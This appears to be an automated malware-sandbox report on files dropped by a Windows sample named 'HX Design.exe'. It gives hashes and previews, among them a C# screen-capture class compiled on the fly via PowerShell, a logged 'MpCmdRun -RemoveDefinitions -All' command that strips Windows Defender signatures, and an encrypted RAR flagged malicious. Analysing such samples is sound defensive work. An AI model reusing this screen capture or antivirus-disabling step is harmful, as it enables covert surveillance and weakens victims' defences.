                                                                                                                                                                                                                                                    SHA1:223B330BC5A834E512C36B81DAE7A21FD00EA0E0
                                                                                                                                                                                                                                                    SHA-256:C9B433C726432997880992B9F2914D132B977A343CE31D67082D91A8A19A7523
                                                                                                                                                                                                                                                    SHA-512:AF851E5652F2D51373AD3E3C1F86A7378EA5655A88EFBF0E010A38A7D0DE5D723A499221E3E1F7A469EE77E68A109FD0DEC1F0C00E6CA239CE7456FD7964C0A5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:.........................................|..V./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                    Entropy (8bit):0.0018090556708630736
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE/lX5k2K:/M/xT02z6
                                                                                                                                                                                                                                                    MD5:CE0B8267AD4D9C71230ED14650161E0E
                                                                                                                                                                                                                                                    SHA1:58063802C11AE5EC5366E02F8A98F9030879E4F6
                                                                                                                                                                                                                                                    SHA-256:C735622E8F83A0A3A90F1F0C13C216EC6E665B3C797221F152BBD5798F6B6B97
                                                                                                                                                                                                                                                    SHA-512:1200E0FB7AD42AA8DE9BD129A26829BC06A2854FFA82AC7C29FAF1A064F42C00BC910C75F056571F2EB8F1923CF9423436F9ED1F89DF93CC515396C1DF94C8AE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):334
                                                                                                                                                                                                                                                    Entropy (8bit):5.146136605610916
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:NcOc+q2Pwkn2EsUKGd8a2jMGIFUt8KOBSZZmw+KOBSNVkwOwkn2EsUKGd8a2jMmd:NA+vYfEsUJ8EFUt8KuSZ/+KuSNV5JfE2
                                                                                                                                                                                                                                                    MD5:346BDD5D37D280A8FEE7F0CF5A4BCA07
                                                                                                                                                                                                                                                    SHA1:A743BAA21A77DDFC9A757E9E4033453BFD26D933
                                                                                                                                                                                                                                                    SHA-256:5D4EA7FCECB0DCF4893182AFD91B10222EA887A5A7DB17B5F1177412E698DB33
                                                                                                                                                                                                                                                    SHA-512:46DCEFD0880A93E987E1B11D1F1DC1FC5C4C3FB3F603BF819C7A9FD0B3F96A67CCD5B36F490080783756F7D5BD35E3271338631FCE5385086F288414F4D6BAA4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:2024/12/20-23:57:20.103 1ddc Reusing MANIFEST C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-23:57:20.157 1ddc Recovering log #3.2024/12/20-23:57:20.157 1ddc Reusing old log C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):334
                                                                                                                                                                                                                                                    Entropy (8bit):5.146136605610916
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:NcOc+q2Pwkn2EsUKGd8a2jMGIFUt8KOBSZZmw+KOBSNVkwOwkn2EsUKGd8a2jMmd:NA+vYfEsUJ8EFUt8KuSZ/+KuSNV5JfE2
                                                                                                                                                                                                                                                    MD5:346BDD5D37D280A8FEE7F0CF5A4BCA07
                                                                                                                                                                                                                                                    SHA1:A743BAA21A77DDFC9A757E9E4033453BFD26D933
                                                                                                                                                                                                                                                    SHA-256:5D4EA7FCECB0DCF4893182AFD91B10222EA887A5A7DB17B5F1177412E698DB33
                                                                                                                                                                                                                                                    SHA-512:46DCEFD0880A93E987E1B11D1F1DC1FC5C4C3FB3F603BF819C7A9FD0B3F96A67CCD5B36F490080783756F7D5BD35E3271338631FCE5385086F288414F4D6BAA4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:2024/12/20-23:57:20.103 1ddc Reusing MANIFEST C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-23:57:20.157 1ddc Recovering log #3.2024/12/20-23:57:20.157 1ddc Reusing old log C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):59
                                                                                                                                                                                                                                                    Entropy (8bit):4.375967574962162
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:3oRKSuytdNIXWtDTDn4:Ys5knftPL4
                                                                                                                                                                                                                                                    MD5:883C9A86B0EDCB0F8CF84346EB70332D
                                                                                                                                                                                                                                                    SHA1:5E23FC7727BEBB49D272BBEFE49B53D816B0F367
                                                                                                                                                                                                                                                    SHA-256:4610E20E703C2016C1BFE0CDC823EBE8CE911F9E23190F780E8634D0D70A51B0
                                                                                                                                                                                                                                                    SHA-512:07174535F747CF939785779BE2892A0444E6D1E1D06E9928A0FDD9804C780C06542421CBF939BC719B03D97F1658D0AB88A4C7203C06EFA91140A440244FEB5E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:2223./devtools/browser/9061386d-2f04-4ecd-b183-0f606898c8c4
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):694763
                                                                                                                                                                                                                                                    Entropy (8bit):7.925872501392444
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:2U9YNlrsDAL0YlKCsI4jx/NmRnuMhPbw5zZFQ+7W1ljA0Y:2f7r6AL0cP3WlU3tw3FQTjy
                                                                                                                                                                                                                                                    MD5:92F98A488F422125CBE28A1292E9134F
                                                                                                                                                                                                                                                    SHA1:2CD7EDD40E3F3040349E9259F4A2834AFEE81240
                                                                                                                                                                                                                                                    SHA-256:D79B2B327378BD1916AF5890EAFBA578EF503C7202CE5FE085F4D2C01B857D88
                                                                                                                                                                                                                                                    SHA-512:53684C88645DB342960268FECAED55AFE6D34A1BB7F23BFB0B0B4A0F8108D494E644248FD8404D064BDA94A7375B067C9587208571C7E2AED3FFF194808792E7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1004
                                                                                                                                                                                                                                                    Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                                                                                                    Entropy (8bit):5.342065897853088
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfVbbmWZEifVbb7:V3ka6KOkqeFkOf9Eifp
                                                                                                                                                                                                                                                    MD5:C424023A1F49A39EE46CC55515517797
                                                                                                                                                                                                                                                    SHA1:BD211A4FAA0BF73361A0E4ECA42086011F3D50B9
                                                                                                                                                                                                                                                    SHA-256:9B9C39583CB074CD6E877D73B229F07ABFB57B9319AB37CD9DB08A2E059EB2F8
                                                                                                                                                                                                                                                    SHA-512:14671B1A1312A3180E69BCB277122AEC8B047EB6C1E429799E11338B68B47DFBB939CCDECC6E96B2B03DFC07B172F54063CC807C2C3F900B9E17B1D9B48E94F6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.0.cs"
                                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                                                                                                    Entropy (8bit):3.1633852575252934
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:6D7oEAtf0KhzBU/9qf6mtJLN0k8pW1ulqa3Oq:9Nz09lmjOkasK
                                                                                                                                                                                                                                                    MD5:5A9DF94C30A75B9E5B31D797654871AA
                                                                                                                                                                                                                                                    SHA1:E59E91311011D85A8496B6D1A2EAC2C21E8F5BCE
                                                                                                                                                                                                                                                    SHA-256:8F1D451521363B5AACAE1D686B0D39F038CA6D7166C1D78F769143D57FD87714
                                                                                                                                                                                                                                                    SHA-512:9863356A3018EC57FFCD81D9D1439A67A2A0115BE38D16092D6EB4D284230E9175D563B042ABA0FBF41D71BD83AEBD27E6163032AEA2D1822FD1689CBF2B8695
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`fg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):1149
                                                                                                                                                                                                                                                    Entropy (8bit):5.503612203252882
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:KJfNlId3ka6KOkqeFkOf9EifsKax5DqBVKVrdFAMBJTH:uNlkka6NkqeFky9EusK2DcVKdBJj
                                                                                                                                                                                                                                                    MD5:57FF9679419C4AE3C1BE128D8FBAB347
                                                                                                                                                                                                                                                    SHA1:C623EF26B785336B2641E18308A7226C33160D96
                                                                                                                                                                                                                                                    SHA-256:EED2534BCFD385C88F528ACE2E38C927B6BC20928970F6D60BB98C7273B73E94
                                                                                                                                                                                                                                                    SHA-512:2756EFADA17461740F765C76D77FE580E24000B7D2EE3950F88C50DA74E107EEEF67B68CCE53622A4D73FAD86B1478CCFE960EFB981BD523ACC7251774CD6847
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                                                    Entropy (8bit):3.1120994738967815
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry3sak7YnqqMhPN5Dlq5J:+RI+ycuZhNtsakSMhPNnqX
                                                                                                                                                                                                                                                    MD5:FDC9F28D0085B9B036156A014DA24210
                                                                                                                                                                                                                                                    SHA1:1BB2D76DCC5680A9DB21880FE8E9A12E00A46180
                                                                                                                                                                                                                                                    SHA-256:5E839724DF5282E331416E79CBA5D49931274CE5073B0A30CC15A787FAC2A100
                                                                                                                                                                                                                                                    SHA-512:C99A74DBDD02E95F46FC3C160A89526FBE4D86F4D89549F48B1E0A4F7671C6422B616CC0586D02ABAF847F5909862CB143D71A6B579B8654CC573494C67B300C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.3.a.j.g.4.5.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.3.a.j.g.4.5.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):894
                                                                                                                                                                                                                                                    Entropy (8bit):3.1176046699489706
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:Q58KRBubdpkoPAGdjrNMUNk9+MlWlLehW51IC0MUs:QOaqdmOFdjr+P+kWResLI2V
                                                                                                                                                                                                                                                    MD5:8E5EABAE0706044221B8E2EFD79877AF
                                                                                                                                                                                                                                                    SHA1:3CC851954C4ED650C08A45464B01FD71E2AA8266
                                                                                                                                                                                                                                                    SHA-256:317194181B80B15207C5DFDED4FAD4357694ABAEA0E570AEA227A69BE4DE2050
                                                                                                                                                                                                                                                    SHA-512:CAE2ABEC9C2F843E223C11FE6F058AFECB4395C0E72698DB511EA1595EA98A5108B158363B76B02C3CE07BF19114116C1565B9B8E61D2D01688F491D603CA4D6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 2.0. .. 2.0.2.4. .2.3.:.5.7.:.1.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 2.0. .. 2.0.2.4. .2.3.:.5.7.:.1.6.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sat Dec 21 06:31:52 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1372
                                                                                                                                                                                                                                                    Entropy (8bit):4.104623038054434
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:HLFq9HhfqaYuUDfH7QwKefN5NII+ycuZhNtsakSMhPNnqS+d:raqcSb/KCN5u1ulqa3OqSe
                                                                                                                                                                                                                                                    MD5:0F43DAD8EE7C5583F5DBA3CE19D9C2B8
                                                                                                                                                                                                                                                    SHA1:2FEDE4D9B7CC18BDD3BBF69390219B5345162645
                                                                                                                                                                                                                                                    SHA-256:D6A871139A377B53A6597D1C57BC0869888E8E045436104621F084AB46EDC21C
                                                                                                                                                                                                                                                    SHA-512:4AAE9BDA9EC6F7C496FAF16C6464A8548C9ACA1B0799CD4A269AEB8EEA4D18FF2A8563374E3EFD13EA735824515AEBBAE3002059717B154174A7521A097583CF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L....`fg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........R....c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP........................6.j.M.B...........4.......C:\Users\user\AppData\Local\Temp\RES6698.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.3.a.j.g.4.5.c...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):676174
                                                                                                                                                                                                                                                    Entropy (8bit):7.999727668689372
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:12288:s5ReQf5MapsV+MdlS5yWQm/A1Ic4P//CV1eXU/KhC2yq+nLhV6TP9NMs2+:GdiYsgMdlSkTSc4/CkhC2KEPzN2+
                                                                                                                                                                                                                                                    MD5:1498F533D25622CF34A275AD96E64432
                                                                                                                                                                                                                                                    SHA1:44A1F4CED9284874E421EE930022538EF4B2DABE
                                                                                                                                                                                                                                                    SHA-256:A506797865D8706C3A79E2F40ED457BCD2ED481E5D8DDE3A43B351F4B82E4F11
                                                                                                                                                                                                                                                    SHA-512:36B1688BAB9EB4F4469E5671958C37FBBFB82F3EA9BFA25A66DDE38D8004C6ECFB329FBF73666E7C55DB7074955499CF0BBE7938754DC3B27F427A2F96BA554C
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:Rar!......w.!.....S..l...1d#..<.r...<r..a.....1.T._MW.u....?#P.h...=.q........cql.6n.Uob.xt......;.%...E..x.\Z........d'?U.....-...hj2`.....X.......@I..>..h.a...Rw.j....d..t....6.F..T.H.fe...q.......g..4..7......m....1EHP....S.....x..c.....6.Q......$.P..b.v.*jih...xp=...5'A..ycf.......#..T.M.`e.|...>Ug.@..v'.?*........l.8,..{}'...3..P.m...#C.3!.../...8-.fH.f\).e....&..E.P..Y?.&..n.h..:...f..|.....6......?....SG.z..I7..5..i..g-..b.m......z..jJ.U. 7...V.o.=.'....ba.....L[.|...YdGfB6l.Z...E.>.........&............h....9.hq.}k.n..N=..t9..Y...FcF..[.|.:h..9.U.....7]..$]Ud..P.8.}|..e..a..(.:...MQ....o.EHZ-bh!..)..vG7F{.U..b>f.......B..a....s.y.n.:.x...<+Ml..T..<y..x{P.....4)'s...@!u.OE4R$..EWm...V.V.BUuAn..`.......e[r.e..F..[`..r.k.k........,RN}3..I...~k..3..~..;.jT......4U........Yj.B..O_..#,.a.W..y...`.$..H..hmv...q=.m..dJ.F6c..)P$...=(.P.(I.u....}<.....v..H.qJ..o.f..:...Hc].3........!.....X.](......6r..w...8]..LS.........Y..._..i).
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):120400
                                                                                                                                                                                                                                                    Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                    MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                    SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                                    SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                    SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):49424
                                                                                                                                                                                                                                                    Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                                                    Encrypted:false
